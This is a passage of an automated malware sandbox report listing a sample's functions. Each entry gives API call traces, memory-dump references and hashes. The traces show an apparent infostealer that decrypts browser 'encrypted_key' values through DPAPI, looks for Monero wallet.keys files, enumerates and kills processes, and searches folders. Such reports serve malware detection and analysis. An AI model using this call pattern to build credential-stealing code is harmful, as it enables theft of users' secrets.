                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,000A1580,000A0D92), ref: 0008F54C
                                    • lstrlen.KERNEL32(00000000), ref: 0008F56B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: e6be56e24154a9dc7a4dd05c49663974d62670ee41f964f1cc4b9e5c165c9959
                                    • Instruction ID: f9e54f50083f9293a16a88ea813a76598e8568c27f091899f383787a14d22eb1
                                    • Opcode Fuzzy Hash: e6be56e24154a9dc7a4dd05c49663974d62670ee41f964f1cc4b9e5c165c9959
                                    • Instruction Fuzzy Hash: A151CE71E10108AADF04FBB4DC96DEE7379AF55300F408529F916A6192EE346A09DBE2
                                    Function 00093560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: ccfb3392df268e032dae63e721f574b63c991c64d11a5b2c5d3e9196808daefe
                                    • Instruction ID: 7d77f3e1c0e6f2b66ced667d64029c87d2e8edf9333ed4fadaff13ff5e6776d8
                                    • Opcode Fuzzy Hash: ccfb3392df268e032dae63e721f574b63c991c64d11a5b2c5d3e9196808daefe
                                    • Instruction Fuzzy Hash: CE413E71E14109AFCF04EFE4D846AFEB7B4BF49304F008418E51676291EB75AA05DFA2
                                    Function 00089CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00089D39
                                      • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                      • Part of subcall function 00089AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                      • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                      • Part of subcall function 00089AC0: LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                      • Part of subcall function 00089B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00089B84
                                      • Part of subcall function 00089B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00089BA3
                                      • Part of subcall function 00089B60: LocalFree.KERNEL32(?), ref: 00089BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 09c8b61ba3f5c381da1508ef302fd6937e65dc54e5a6591febd42f36fc5810c2
                                    • Instruction ID: eeba982022536b019ee9232b13e732daf4309223df97b0037d73c41519a1cc1b
                                    • Opcode Fuzzy Hash: 09c8b61ba3f5c381da1508ef302fd6937e65dc54e5a6591febd42f36fc5810c2
                                    • Instruction Fuzzy Hash: 26313EB5D10209ABCF04FBE4DC85AFEB7B8BF48304F184519E945A7242EB349A14CBA5
                                    Function 000994D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 000994EB
                                      • Part of subcall function 00098D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0009951E,00000000), ref: 00098D5B
                                      • Part of subcall function 00098D50: RtlAllocateHeap.NTDLL(00000000), ref: 00098D62
                                      • Part of subcall function 00098D50: wsprintfW.USER32 ref: 00098D78
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 000995AB
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 000995C9
                                    • CloseHandle.KERNEL32(00000000), ref: 000995D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 3729781310-0
                                    • Opcode ID: 11d28576251538f30d4878e01e08e2e6c5d11138cb1e309907aa178fb930966c
                                    • Instruction ID: 4300c8c0662318b17426ac82fc97292dd88c8097b78ed478660149f987491e9a
                                    • Opcode Fuzzy Hash: 11d28576251538f30d4878e01e08e2e6c5d11138cb1e309907aa178fb930966c
                                    • Instruction Fuzzy Hash: B5313C71E0020CAFDF14DBD4DD49FEEB7B8FB44304F104559E506AA184DB74AA89DB52
                                    Function 00098680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000A05B7), ref: 000986CA
                                    • Process32First.KERNEL32(?,00000128), ref: 000986DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 000986F3
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • CloseHandle.KERNEL32(?), ref: 00098761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: bc06f9be847d55c790ce4df1b634888fa0f3346d814bf9dbb93693304aabfccd
                                    • Instruction ID: 28a770abcd17d0799646d805156b67f20958869bb8dab24ed61be8cbd8d3e747
                                    • Opcode Fuzzy Hash: bc06f9be847d55c790ce4df1b634888fa0f3346d814bf9dbb93693304aabfccd
                                    • Instruction Fuzzy Hash: B7314D71A11218ABCF24DF95DC45FEEB778FB46700F104199F10AA61A1DF306A45DFA1
                                    Function 00097980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000A0E00,00000000,?), ref: 000979B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000979B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,000A0E00,00000000,?), ref: 000979C4
                                    • wsprintfA.USER32 ref: 000979F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 3db8a3349c6aa84a1d59d11132d9ca7b9edc0e2c82c62a49132cf3dd0ad54647
                                    • Instruction ID: 8e2cbf19dd493d2b1d3ba30ac518c0e96a9be8877080c3187ba6e4876b897745
                                    • Opcode Fuzzy Hash: 3db8a3349c6aa84a1d59d11132d9ca7b9edc0e2c82c62a49132cf3dd0ad54647
                                    • Instruction Fuzzy Hash: 5C1115B2904118ABCB149FC9ED49FBEB7F8EB48B15F10421AF605A2280E2395940DBB1
                                    Function 0009C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0009C74E
                                      • Part of subcall function 0009BF9F: __amsg_exit.LIBCMT ref: 0009BFAF
                                    • __getptd.LIBCMT ref: 0009C765
                                    • __amsg_exit.LIBCMT ref: 0009C773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0009C797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: eb81484084110f7b2f6be819198dc62ad258f09fa79ae0786887f068fd011611
                                    • Instruction ID: 20987f5c33e9b1e45bdf8ca57ce5139b357ad4d64892f984acd7f8c05e315e59
                                    • Opcode Fuzzy Hash: eb81484084110f7b2f6be819198dc62ad258f09fa79ae0786887f068fd011611
                                    • Instruction Fuzzy Hash: 35F09032E08A009BFF60BBF86946B9D73E06F01720F204159F404A61D3DB645940BE96
                                    Function 00094F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094F7A
                                    • lstrcat.KERNEL32(?,000A1070), ref: 00094F97
                                    • lstrcat.KERNEL32(?,00D389E8), ref: 00094FAB
                                    • lstrcat.KERNEL32(?,000A1074), ref: 00094FBD
                                      • Part of subcall function 00094910: wsprintfA.USER32 ref: 0009492C
                                      • Part of subcall function 00094910: FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                      • Part of subcall function 00094910: FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                      • Part of subcall function 00094910: FindClose.KERNEL32(000000FF), ref: 00094B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: f2f787d6057ca9b9c4330dd4638f931d757373cccbfa7bbdc7147fb29a515c43
                                    • Instruction ID: fd3f79142ff3f8f7f962b8dce798fb5b6a4abaf9f7d6354cbb23d188d7af0a41
                                    • Opcode Fuzzy Hash: f2f787d6057ca9b9c4330dd4638f931d757373cccbfa7bbdc7147fb29a515c43
                                    • Instruction Fuzzy Hash: F821AD7690020CA7CB54F7B0FC4AEED333CAB55304F404558B65997182EE7596C9CB93